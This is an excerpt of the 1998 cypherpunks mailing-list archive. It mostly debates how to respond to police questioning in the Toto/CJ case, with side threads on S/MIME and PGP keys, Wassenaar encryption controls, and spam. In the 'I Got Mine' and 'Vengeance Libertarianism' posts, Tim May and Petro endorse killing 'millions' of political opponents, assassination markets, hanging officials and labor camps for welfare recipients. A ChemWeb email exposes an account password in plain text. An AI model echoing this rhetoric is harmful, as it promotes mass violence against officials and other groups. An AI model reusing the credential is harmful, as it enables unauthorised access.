self-government, individuality, privacy, etc. (not that I would have a prolonged
argument, but only that I would inquire as to why they are so far out of touch).
If they have any intelligence at all, they will learn something;  if not, well,
let's compare that to the time wasted trying to enlighten one of our current
prolific posters, whose name I shall not mention because I'm sympathetic to his
condition, or all the time which has been spent going over the same arguments
with those who never got any benefit from it anyway.  If there's anyone I would
be glad to aim flashes of brilliant arguments toward, it would be an IRS agent.
At least they would know definitely, without my having to flash my gun or pour
chemicals on their office rug, where I would stand in a case of "emergency".   I
am not afraid of making my stand this way, to their face.

If it is anyone who could use some perspective on the controversies over
government and privacy, it would be them.   And above all else, beyond being
symbolically defiant, I would first aim for being Real.   It can be the hardest
thing to do, stand your ground and be calm and real.

   ..
Blanc
Think Thong




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 4 Dec 1998 13:20:36 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <199812040239.VAA12949@mail1.panix.com>
Message-ID: <000c01be1f42$e07f6320$2f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Duncan Frissell:

: The opening of  "HOW TO BREAK THE LAW"
:
: By Duncan Frissell
:
: For a fair number of readers, the day may come when the men
: in the funny suits walk up to you, ask if you are you, and then exercise
: their power of arrest. For those without much experience in getting
: arrested, let me tell you what in general it will be like (details may vary).
.............................................


Been waiting for that book, Duncan.  Need any help?  : )

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 4 Dec 1998 11:18:43 +0800
To: Tim May <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <000201be1e81$1d19d800$7d8195cf@blanc>
Message-ID: <199812040239.VAA12949@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:42 PM 12/3/98 -0800, Tim May wrote:

>It seems to me that when you invite them in for cookies and tea and have a
>"pleasant" conversation with them, you are only helping to put away Toto.
>Whatever you tell them, they will almost certainly only use the negative
>things you tell them. Or the general knowledge you give them, or contact
>lists, etc.
>
>I have not been contacted by either American or Canadian cops with regard
>to either Jim Bell or Toto. I _hope_ I will have the presence of mind to
>tell them to leave.

The opening of  "HOW TO BREAK THE LAW"

By Duncan Frissell 

For a fair number of readers, the day may come when the men in the funny
suits walk up to you, ask if you are you, and then exercise their power of
arrest. For those without much experience in getting arrested, let me tell
you what in general it will be like (details may vary). 

But first let's review arrest etiquette. Arrest etiquette can be
complicated for the arresting officers but it is easy for the arrestee.
There are only two rules: 1) Keep your mouth shut and 2) Cooperate
physically with the arrest. Following rule two will help preserve your
kidneys, limbs, and skull but following rule one is the most important. 

During the first two years after your arrest, there are only four words
that you should speak to minions of the State in an official capacity: 

"I want a lawyer" 

Say nothing else. You gain NO benefits by saying things to the cops and the
prosecutors for free. If your lawyer cuts a deal for you, you can talk in
exchange for something but once you speak you can't take the words back.
Lawyers are constantly amazed and entertained by the things their clients
tell the cops. Don't say anything. It's stupid. 


DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 4 Dec 1998 14:21:05 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <v03130326b28cc1ba69cb@[209.66.100.75]>
Message-ID: <v0313032ab28d26aeb57f@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:39 PM -0800 12/3/98, Blanc wrote:
>Well, I'm glad my post has stirred up everyone into providing examples of
>proper
>cpunk behavior/responses when confronted with a visit from the Friendly
>Neighborhood Investigation Corp.   It's great you're sharing your ideas on
>recalcitrance and resistance, it's more useful than all the jibberjabber about
>how much you hate the govmt.   (Yes, but how do you actually respond to a real
>live representative standing at your door (they showed me their Batches), to a
>real-live situtation when you are taken to a little room and asked to strip
>("asked"?) at the airport?)   Ya'll should have done this earlier, when
>the news
>of Toto first came out.  And think about it now, because if any mail from you
>was on his computer, you're likely to be next.

I was very careful to phrase my points in terms of how I _hope_ to respond
in a certain way, not claiming I have in the past or know I will in the
future. Maybe I'll wimp out, maybe I'll offer to tell them everything I
know about the Politician Removal Lottery, maybe I'll open up on them with
my shotgun. Who knows?

My point, parallel to Duncan's, is that talking to narcs and cops almost
always never helps the accused. If one's goal is to help the prosecution,
then by all means talk to the prosecution's investigators.

As for the general points, Duncan and several others have made these kinds
of common sense points in the past...even when you were subscribed to the
list. For example, some folks even carry a "What to do if questioned by the
police" card in their wallet, to either read from--assuming this is
allowed--or to reread occasionally as a reminder.

You, apparently having had personal contact with either one or both of the
parties, and living in the state where both cases are centered, might have
anticipated questioning by the cops.


>
>But relax!  -  I said nothing which is not public knowledge, which is not
>already evident from the list archives.

Don't understimate the help that a helpful person provides.

--Tim May




"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 4 Dec 1998 15:40:47 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <v0313032ab28d26aeb57f@[209.66.100.75]>
Message-ID: <000f01be1f56$548fa0a0$2f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Tim May:

: I was very careful to phrase my points in terms of how I
: _hope_ to respond in a certain way, not claiming I have in the past or know I
: will in the future. Maybe I'll wimp out, maybe I'll offer to tell them
: everything I know about the Politician Removal Lottery, maybe I'll open up
: on them with my shotgun. Who knows?
.............................................


I expect how one responds will in part depend on how rational you think "they"
are, or suppose them to be.   I know that if I had been just subpoenaed with a
piece of paper I would have said 'no' or just not shown up, in spite of the
trouble that might get me into.   But I generally wouldn't prevent from talking
to Authorized Government Officials, although only a very little.   I think it's
best to try to understand the situation first, and see what the deal is, before
jumping to conclusions and alarming them into attack mode, like Hyper-Anon
mentioned (I hadn't envisioned such a scenario, thanks for the notice (how do
you know about this, or are you just imagining that that's what will happen?) ).

I did say that everyone should think about their own responses to trying
situations, because it is a valuable mental exercise.   Some people's bark *is*
louder than their bite, after all, and they do bark pretty loudly in email,
especially anonymously.


   ..
Blanc, who will no longer talk to strangers in the hall without first conferring
with Duncan McCloud of the Clan of Immortals




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <phormiga@bigfoot.com>
Date: Fri, 4 Dec 1998 09:05:18 +0800
To: jyu-ohjelmointi-cypherpunks@uunet.uu.net
Subject: Make your own IQ test online!!! (Free+FUN)
Message-ID: <747adv$rk6$449@talia.mad.ibernet.es>
MIME-Version: 1.0
Content-Type: text/plain



you can do it now!

Youll know your IQ in a few minutes

Go to

http.//www.hormiga.org/iqt.htm

FREE AND FUN

Youll know your Intelligence Coeficent

Spanish version

http://www.hormiga.org/iq.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Fri, 4 Dec 1998 17:07:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
In-Reply-To: <ca14be1153bfe98984f5446e38835b26@anonymous>
Message-ID: <4.1.19981204004646.00c20670@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain



>The MIB have a convenient way around this. If you let them in voluntarily,
>they're nice. If you make them get a warrant, they come back, guns drawn.
>They barge in and tear the place up for hours. Maybe they'll hack down some
>of the walls to search for drugs. In the end, you have something which is a
>cross between a pile of papers, a bunch of dust, electronic parts, wiring,
>torn up books, destroyed furniture, and a pile of crumbled drywall to call
>home.

Yeah and active evil is better than passive good.

We should submit ourselves to what is Not the law
because we fear what is the law?

Thats a great world, where do I sign up?

-Ian


Welcome to 1984
as with all goverment projects, its a bit late 
and slightly overbudget
	-Ian Briggs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 4 Dec 1998 09:05:58 +0800
To: cypherpunks@toad.com
Subject: Mixmaster client 4 the Mac OS?
Message-ID: <199812040042.BAA01772@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I heard sometime last summer that the mixmaster client was being ported to the Mac. Does anyone know the status of this project?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Thu, 3 Dec 1998 22:01:30 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: open-pgp / s/mime interoperability
Message-ID: <91269213708678@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> writes:
>Peter Gutmann writes:
>>>open-pgp public keys aren't based on X.509 keys, so I would've thought
>>>s/mime implementation would barf on them.  
>> 
>>Actually S/MIME *could* support the use of PGP keys, but there's a field
>>(the SubjectKeyIdentifier) missing from the CMS SignerInfo which prevents
>>this.  
 
>Surely this in itself should be a compelling argument for inclusion of the 
>SubjectKeyIdentifier?  
 
I'm trying to get this adopted for CMS, the underlying data format for 
S/MIME.  The silly thing about this is that alternative key identifiers (like 
PGP keys) were going to be included in RSADSI's PKCS7v2, but aren't included 
in the IETF version of the same thing.  The result is that you have a private 
company going out of its way to accomodate open standards, and the IETF going 
out of its way to lock them out.  Weird.
 
>If it allows conversion of PGP keys into S/MIME X.509 keys.
 
You don't need this conversion, with key identifiers you can use both SPKI and 
PGP keys directly within S/MIME.  There's no need to convert them into an 
X.509-like format first.
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@chemweb.com
Date: Fri, 4 Dec 1998 21:16:09 +0800
To: cypherpunks@toad.com
Subject: ChemWeb password
Message-ID: <199812041248.EAA17113@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Dr cypherpunks cypherpunks

Someone has used our password utility located at

http://chemweb.com/user_gateway/html/forgot_password.html

to request that the password for your account be sent to this email address
(the one that we have on file for your account).  If it wasn't you, don't 
worry, because no one can ever get your password except you (we only 
mail it to the email address on file).  Someone probably entered the 
wrong address by accident.

If it was you, then here's the information that you've been waiting for.

Your Member Name is: cypherpunks
Your Current Password is: crossfire

For additional help with technical problems, please see our online 
help guide at

http://chemweb.com/help/html/index.html

ChemWeb administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 4 Dec 1998 13:01:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <ca14be1153bfe98984f5446e38835b26@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Now there's a really intelligent response to the MIB! I think Blanc would
>have done a better self-service to have responded that way.
>
>MAKE THEM GET A WARRANT! It's your ONLY legal defense against a fishing
>expedition! It's our CONSTITUTIONAL RIGHT to require a warrant before
>letting them in! We are NOT criminals just because we do not allow the MIBs
>to make ILLEGAL and UNCONSTITUTIONAL searches of our properties!
>
>If they can't convince a judge AND obtain a specifically worded search
>warrant then they are obviously fishing! Tell to go find a real deep lake...
>
>I also give the writer an A+ for the Clintonian and Reagonesque touches!
>
>APF

The MIB have a convenient way around this. If you let them in voluntarily,
they're nice. If you make them get a warrant, they come back, guns drawn.
They barge in and tear the place up for hours. Maybe they'll hack down some
of the walls to search for drugs. In the end, you have something which is a
cross between a pile of papers, a bunch of dust, electronic parts, wiring,
torn up books, destroyed furniture, and a pile of crumbled drywall to call
home.

Heil Klintonkov! Heil Reno! Heil Freeh!

StatistMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealNetworks News <announce@dmail1.real-net.net>
Date: Sat, 5 Dec 1998 00:35:11 +0800
To: cypherpunks@toad.com
Subject: Surf the Web 20-Times Faster
Message-ID: <199812041601.IAA30445@fmailb1.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear RealPlayer User,

Want to speed up your Internet connection without 
purchasing a new modem? Tired of long-download times 
and network problems? 

For a limited time, RealNetworks invites you to 
download PeakJet 2000-which can speed your web surfing 
up to 20-times faster-for only $14.95!

Read on, or download now:

=>  http://www.realstore.com/specials/onesurfing.html

How does it work? PeakJet's technology automatically 
learns from your browsing habits. While you read through 
a page, PeakJet 2000 intelligently works behind the scenes 
and preloads and freshens links according to your interests. 
When you click, the next page appears almost instantly. All 
you do is download PeakJet 2000 and start surfing at 
lightening speed!

PeakJet 2000 also offers these great benefits:

   - Speeds Web surfing up to 20-times faster without 
     requiring a new modem-and works with any modem speed.
   - Maximizes idle modem time; intelligently preloads pages 
     while you go about your normal browsing. 
   - Economizes bandwidth by devoting cache to your favorite 
     links or frequently visited Web pages.
   - Comes with a 30-day money-back guarantee.

PeakJet 2000 was awarded a 5-star rating by ZDNet.
For a limited time, it is only $14.95 - the lowest
price for PeakJet 2000 anywhere! 

To download now, visit:

=>   http://www.realstore.com/specials/twosurfing.html

Thank you for continuing to use RealNetworks products.

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

----------------------------
ABOUT THIS E-MAIL

Participation in RealNetworks product updates and special 
offers is voluntary. During the installation of the RealPlayer 
software you indicated a preference to receive these e-mails.

For information about unsubscribing from future
announcements, do not respond to this email, instead
visit: http://www.real.com/mailinglist/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 4 Dec 1998 23:28:03 +0800
To: ian@deepwell.com (Ian Briggs)
Subject: Re: I Got Mine
In-Reply-To: <4.1.19981204004646.00c20670@deepwell.com>
Message-ID: <199812041501.JAA09183@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



> >The MIB have a convenient way around this. If you let them in voluntarily,
> >they're nice. If you make them get a warrant, they come back, guns drawn.
> >They barge in and tear the place up for hours. Maybe they'll hack down some
> >of the walls to search for drugs. In the end, you have something which is a
> >cross between a pile of papers, a bunch of dust, electronic parts, wiring,
> >torn up books, destroyed furniture, and a pile of crumbled drywall to call
> >home.

I actually seriously doubt this.

I think that they actually respect people who do not suck up to them,
and know the laws. They are people and, if they have a choice, would
rather harass someone who puts up with it, than someone who can get them
some serious trouble.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 4 Dec 1998 23:18:18 +0800
To: cypherpunks@cyberpass.net
Subject: The Beeb speaks like a cypherpunk once removed...
Message-ID: <v04020a38b28d9fc4e021@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

There's some discussion on the BBC about that Chinese businessman who's now in
the klink for "conspiring against the state using the internet" :-).

The Beeb has an internet correspondent, and he's, right now, talking about
strong crypto, anonymous remailers, and quoting Gilmore's censorship is damage
line. All without using the words "strong cryptography", or "anonymous
remailers", or "John Gilmore". :-).

He was talking about how the Chinese website was hacked within hours and
painted over with pro democracy stuff and links to Amnesty International,
among other things.

All of this was in a favorable, horse is out of the barn, this is good for
freedom, light.

Cheers,
Robert Hettinga


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNmfw9cUCGwxmWcHhAQEDEwf9H9xqZ2LU935VawA9ZwpzFPF2CKrl1xam
jzGJX2uTOhiYGtkQhZ2hFY7/ISoNGXvinwHACycXVi5AdxR6//2tzr1szjk4bgB5
NvKW+1gJJWP5bD0Kz3JwYui3t2fAetjSg94HCxcWbSQM4NJVP6IBXyg48ZtGmkVE
UqvhwYc41NHVDgZt/ist5EQEAWcWh3/qApEbeS8xG7SP4FZeCeogCidVmQuMWC1u
sAQbrd5fdFdTcUs0feuk9zBpEklTe3AljfnDbfSEUpyok29L+9R3cqAyh/5GM0yd
3uVQTmqOSMLK0o+L9tuejgkaTGnI7Co2NXaYbh/jPKGzm/OAYr7/fQ==
=FU5E
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Dec 1998 23:26:03 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Wassenaar Statement
Message-ID: <199812041448.JAA23610@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The Secretariat of The Wassenaar Arrangement has issued
brief public docs on the recent meeting:

   http://jya.com/wa-state98.htm

Only one brief mention of encryption:

     "8. The WA agreed control list amendments to take into account 
  recent technological developments. The amendments to the lists 
  included elimination of coverage of commonly available civil 
  telecommunications equipment as well as the modernisation of 
  encryption controls to keep pace with developing technology and 
  electronic commerce, while also being mindful of security interests. 
  Participating States also discussed the potential need for the WA 
  and national export control authorities to respond quickly and 
  effectively to the emergence of new technologies."

Which appears to confirm that each state will implement and
announce its encryption policy as it sees fit. The US has jumped
to proclaim to its constituencies that it has won.

Though it's the secret agreements that remain to be publicized.
Note the gaps in the public docs and dissimulative assurances.

We also offer a recent related message from Denmark on its 
fluid crypto policy:

   http://jya.com/dk-crypto98.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Fri, 4 Dec 1998 19:20:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <3.0.3.32.19981204095905.00693d50@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



>The MIB have a convenient way around this. If you let them in voluntarily,
>they're nice. If you make them get a warrant, they come back, guns drawn.
>They barge in and tear the place up for hours. Maybe they'll hack down some
>of the walls to search for drugs. In the end, you have something which is a
>cross between a pile of papers, a bunch of dust, electronic parts, wiring,
>torn up books, destroyed furniture, and a pile of crumbled drywall to call
>home.
>
>Heil Klintonkov! Heil Reno! Heil Freeh!
>
>StatistMonger
>

Unfortunately, this is true. That's why I loved the response given by Anon!
It accomplished all the right things without giving them cause for coming
back!!

VERY, VERY GOOD!

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 5 Dec 1998 02:37:40 +0800
To: cypherpunks@cyberpass.net
Subject: Vengeance Libertarianism
In-Reply-To: <v03130327b28cfbd19803@[209.66.100.75]>
Message-ID: <v0313032db28dd1b178bb@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:04 AM -0800 12/4/98, Petro wrote:

>	I just disagree with your "millions who need killing". Because some
>beleives in a polly-annaish world were taking guns away from the "good
>guys" also keeps them away from the "bad guys" is no reason to kill them.
>It's a reason to render them impotent until such time as they wake the hell
>up, and if they don't manage to wake the hell up until some mugger points a
>chinese manufactured .25 at them in the middle of the night and just
>fucking pulls the trigger because murder carries the same punishment (or
>less) than carrying a gun (enemy of the state) then "we" didn't kill them,
>they killed themselves.

You are free to adopt the beliefs of what I'll call "the forgiveness
libertarians." Summarized, roughly, as:

"You've been stealing from me, sending my sons to die in your foreign wars,
imprisoning my friends for what they smoke or eat...but let's let bygones
be bygones...stop your stealing ways and we'll forget about what you did in
the past."

This is a dominant thread of libertarianism, though it is seldom
articulated as I have just done. Look at the platform of the Libertarian
Party and you'll see this "forget the past, look to the future" approach.

I, on the other hand, have drifted into the camp I will dub "the vengeance
libertarians." Summarized, roughly, as:

"You've stolen my property, you've imprisoned my friends, you've passed
laws making us all criminals, you've started wars to enrich your
military-industrial complex friends, and you're corrupt bastards. You can
forget about some kind of "libertarian amnesty." It's going to be payback
time, with at least hundreds of thousands of statist judges, politicians,
cops, soldiers, and other such persons going to the gallows. Payback time.
Welfare recipients are going to have to pay back all that they have stolen,
with compounded interest. Out of their pockets, or while in labor camps.
Payback time."


--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 5 Dec 1998 00:48:16 +0800
To: cypherpunks@cyberpass.net
Subject: RE: I Got Mine
In-Reply-To: <v04011721b28ccb62ad25@[206.189.103.230]>
Message-ID: <v04011724b28da8949eac@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:42 PM -0500 12/3/98, Tim May wrote:
>At 3:13 PM -0800 12/3/98, Petro wrote:
>>At 5:42 PM -0500 12/3/98, Tim May wrote:
>>>
>>>If they want me to speak about assassination markets, the need for killing
>>>millions of political criminals, and the use of anonymous systems for
>>>smashing the state, why would I ever agree to speak with cops?
>>
>>	I think millions is overstating things just a little bit, unless
>>you mean world wide.
>
>Those of who have voted to take away guns, those who have actually done the
>taking away, those who have sent in JBTs to break into homes, those who
>have ....
>
>It adds up fast. Whatever the precise total is, removing them is what
>crypto anarchy and untraceable transactions make possible. Read about this
>is my Cyphernomicon, released long before Jim Bell had his "wonderful idea."

	Yeah, yeah, I've read parts of it. I've been here a while under
different email addresses, so I'm more than a little familiar with the
whole crypto-anarchy thing.

	I just disagree with your "millions who need killing". Because some
beleives in a polly-annaish world were taking guns away from the "good
guys" also keeps them away from the "bad guys" is no reason to kill them.
It's a reason to render them impotent until such time as they wake the hell
up, and if they don't manage to wake the hell up until some mugger points a
chinese manufactured .25 at them in the middle of the night and just
fucking pulls the trigger because murder carries the same punishment (or
less) than carrying a gun (enemy of the state) then "we" didn't kill them,
they killed themselves.

	It's the leaders, the Guys In The Three Peice Suits that need the
killing. The KNOW better. They have the information, they have the studies.
They choose to manipulate people, to feed their fears and _tell_ them that
disarming them is making them safer.

	They lie, and in lieing reduce the saftey of ALL of us. For that
they deserve to hang.
--
Five seconds later, I'm getting the upside of 15Kv across the nipples.
(These ambulance guys sure know how to party).
The Ideal we strive for: http://www.iinet.net.au/~bofh/bofh/bofh11.html
No, I don't speak for playboy, They wouldn't like that. They really wouldn't.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Fri, 4 Dec 1998 19:23:12 +0800
To: cypherpunks@cyberpass.net
Subject: RE: I Got Mine
In-Reply-To: <v03130326b28cc1ba69cb@[209.66.100.75]>
Message-ID: <3.0.3.32.19981204110934.033b17a8@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



At 08:39 PM 12/3/98 -0800, you wrote:
>Well, I'm glad my post has stirred up everyone into providing examples of
proper
>cpunk behavior/responses when confronted with a visit from the Friendly
>Neighborhood Investigation Corp.   It's great you're sharing your ideas on
>recalcitrance and resistance, it's more useful than all the jibberjabber
about
>how much you hate the govmt.   (Yes, but how do you actually respond to a
real
>live representative standing at your door (they showed me their Batches),
to a
>real-live situtation when you are taken to a little room and asked to strip
>("asked"?) at the airport?)   Ya'll should have done this earlier, when
the news
>of Toto first came out.  And think about it now, because if any mail from you
>was on his computer, you're likely to be next.

I specifically remember a number of clueful letters on the topic which hit
this list as the whole CJ issue came up. As I recall, there were plenty of
warnings that cpunks could expect visits. In fact, you're "I got mine"
subject line seems to indicate that you were aware of this concept. 

Secondly, since e/mail is a digital phenomenon, it can not be physically
attached to a source. Since perfect copies of it can be freely made any
computer can be made to appear as the originating computer. It is the very
easiest type of "evididence" to plant. Imagine a virus or Trojan horse that
put incriminating stuff on a computer w/o the owner knowing about it. The
technology is readily available and no doubt in use. You think that a cop
who would use a "throw down" gun or plant physical evidence wouldn't also
be capable of planting digital evidence. 

I think it will be very interesting once the true nature of computer
contents are litigated in terms of its non-physical nature. Without a
digital signature that cannot be forged any file on any computer is really
just digital nothingness that could have been placed there by anyone. There
is absolutely no way to prove anybody wrote anything unless you have a
number of reliable eyewitnesses physically present at the event.

COPS LIE!! FEDS LIE!!  Those alleged threats by Toto may (probably)
actually be the result of some MIB that couldn't get anything else on him.
So he invented the letters and later planted them on CJs computer during
the undoubtedly unsupervised session in which they supposedly read these
things off his computer.

I personally have been roughed up (no bruises, unfortunately) by cops when
I refused to allow them to search my car. Fortunately all the uproar gather
such a crowd that they were unable to plant any false evidence and since
there was nothing there in the first place they had nothing to hold me on.
I wish they had bruised me, it would have made settlement talks faster and
more productive ;)

When asked at the Dusseldorf airport to turn-on my computer, I did ask why.
When told that they wanted to make sure it was real. I clicked it on, let
whir around for a couple of seconds and turned it off. No problem. Had they
asked to see they contents I would have refused. That would be like letting
them read my personal papers, which they have no right to do. If arrested I
will fight it. But I'm a real hard-head. That's why I left the US. Got
tired of always being hassled.

However, hard-headed I am, I do admire the wonderful suggestions (a la
Clinton) by anon!

>
>But relax!  -  I said nothing which is not public knowledge, which is not
>already evident from the list archives.  As far as I'm concerned, it was true
>but essentially useless.   I confirmed things which they already knew or
would
>already know from the postings to the list -  they mentioned Tim's
attitude, for
>instance, and Declan's stories on Toto, and the info on John Young's website,
>and Toto's website, and asked me if I knew of Adam Back (who?).   

The stuff on this list is only public knowledge from a legal stand point.
It is often technologically or ideologically so far over most peoples heads
(especially MIBs and AOLes) that it is unfair to characterize it that way.
Besides, the real point isn't that they know anything, it's that they have
either identified you as a possible stooge or a suspect. You helpfulness is
probably going to cost someone (maybe yourself) very dearly.

Innocent people get fried all the time because of bad IDs. "Well, I thought
it was him...It LOOKED like him..." If you aren't sure--keep it to
yourself. And if you weren't then when CJ allegedly wrote and sent those
letters then it is impossible for you to be sure. So, PLEASE do everyone a
favor and stop "helping".

>Furthermore,
>just because I am nice and mannerly doesn't mean I couldn't as well be a
>hypocrite.   James Bond is also a complete gentleman.  Depending on the
>circumstance.
>(Q:  so, are you a hacker?   A:   <g>  no.  I don't know Unix)

I have considered the possibility that you are in fact some sort of
government "agent" and your mission is to draw out similar (unfounded)
convictions of CJ from others on the list. If that is your purpose, may you
burn in Hell. 

The bottom line is if you are not working to help build the governments
case, then on your next visit with them please try a little honest doubt
and forgetfulness.

>
>
>Tim said:
>
>: Blanc, I'm afraid that in your desire to be "helpful," you have only
>: worsened the situation for Toto. Believe me, they are not interested in
>: exculpatory evidence...whatever that might be in this
>: context. They are more likely interested in contact lists, in educating
>: themselves to make themselves more convincing witnesses, etc. Expect to see
>any
>: knowledge you conveighed to them coming back in Toto's trial from the
mouths
>of
>: prosecution witnesses.

A Note to Tim, I don't think you are as sure of Toto's identity as you
sound. I'm not even sure you mean to sound as if you are sure of his
identity. It may just be from the urge to type less keystrokes. Whatever
the case, if your not sure CJ is the one and only Toto then please refer to
Toto for Toto stuff and CJ for the guy in Jail. It's more clear and since
CJ is innocent until proven guilty, we should give him the benefit of the
doubt.

>
>I was not being "helpful".  I relied to their inquiries; I didn't offer
>information.  I made my own inquiries to them, as I already said, about the
>dividing line between free speech and when they will go seeking to arrest a
>person.
>
>In terms of educating them, I don't have any objections to probing their
mind to
>see what/how they think about things which we have discussed at length on the
>list.   I also don't have any objections in referring them to read
further:   I
>told them that the cpunks often have deep discussions on this and other such
>subjects, where we  pursue an understanding of controversial issues like free
>speech and privacy.   I told them that there were many very smart people
on the
>list, especially back in the earlier years, although some of these had
left to
>pursue their other interests.  

And there were a lot of smart people on McCarthy's list... All turned in by
people who couldn't possibly know the truth about the person they accused.
Or perhaps did it save their own butt.

Hell, maybe this will the McCarthy case of the new century... It should
take about two years to blow up into a full on witch hunt and blacklisting
of cpunks and other "anti-social" types. With the Y2K problem sure to be
pissing lots of people off, the public will certainly be willing to support
ridding society of all those computer geeks that have caused all this
trouble...

>of heat and sometimes light.  (they didn't ask, and I didn't tell them, which
>side of the spectrum I'm on)

It doesn't matter. Their job is NOT to find the truth. Their job is to
build cases. These are not equivalent endeavors. Far too many times they
are not even compatible endeavors.

>   I am not afraid of making my stand this way, to their face.

Fine, but until they arrest you stay out of it. Use YOUR trial as your
soapbox and not CJs.

>
>If it is anyone who could use some perspective on the controversies over
>government and privacy, it would be them.   And above all else, beyond being
>symbolically defiant, I would first aim for being Real.   It can be the
hardest
>thing to do, stand your ground and be calm and real.

Then please, get real and get honest, stop talking about things you THINK
are true. Those are opinions NOT facts, and should not be confused. Put
those fuzzy warm feelings away and face the fact that these guys are not
your girl friends chatting and discussing things that tick them off. These
guys are out to build a case against someone so that they can destroy his
life. HE IS INNOCENT UNTIL PROVEN GUILTY. He has a right to a FAIR trial.
PLEASE, let's wait for the trial before convicting him!!!

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 5 Dec 1998 03:57:42 +0800
To: cypherpunks@Algebra.COM
Subject: Re: joy of export, h/ware
Message-ID: <3668373B.7F32@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>>What type of attack was used in the famous test? Known plaintext? It
>>gets a bit tougher in the real world doesn't it?
> 
> Not really.  
>
Even if you don't know what you're looking for? Help me out with that
one.

> * PGPfone on a  very fast cpu plus fast link is still less pleasant
> than a noisy cordless (no pun intended).
>
You trust PGPfone on commercial HW enough to do your spy work with it? A
system with dedicated audio compression ( http://www.dspg.com/ e.g. )
and a modem could probably be used to establish a secure, full-duplex
link over the POTS. A microP, possibly with a small gate array to accel
the crypto, would be able to handle the rest of job. Actually a pretty
simple product. It could even use your dial-up account and be your
